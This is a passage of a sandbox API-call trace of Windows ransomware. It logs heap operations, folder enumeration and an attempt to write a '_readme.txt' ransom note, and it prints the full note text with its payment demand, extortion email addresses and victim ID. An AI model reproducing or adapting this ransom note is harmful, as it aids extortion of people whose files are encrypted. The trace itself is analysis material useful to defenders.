dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32534f8 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3252310 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323da90 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323dac8 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32523d8 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32524a0 | out: hHeap=0x750000) returned 1 [0209.585] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3253468 | out: hHeap=0x750000) returned 1 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7b38f0 | out: hHeap=0x750000) returned 1 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a84078 | out: hHeap=0x750000) returned 1 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x328bd38 | out: hHeap=0x750000) returned 1 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.586] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.586] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.586] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.587] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.587] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.588] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.588] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.589] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.589] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.590] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.590] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.590] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.590] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.590] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.590] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.590] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.590] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.590] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.590] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.590] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.590] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.590] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.590] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.590] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.590] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.590] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.590] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0209.590] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.590] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.590] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.590] PathFindFileNameW (pszPath="") returned="" [0209.591] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286300 [0209.591] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.591] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.591] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.591] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.591] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.591] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.591] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.592] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0209.592] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.592] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.592] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0209.593] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.593] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.593] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.593] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32da538 [0209.593] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.594] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.594] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.594] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.594] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.594] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.594] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.594] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.594] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.594] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.595] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286440 [0209.595] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.595] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.595] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.596] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.596] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 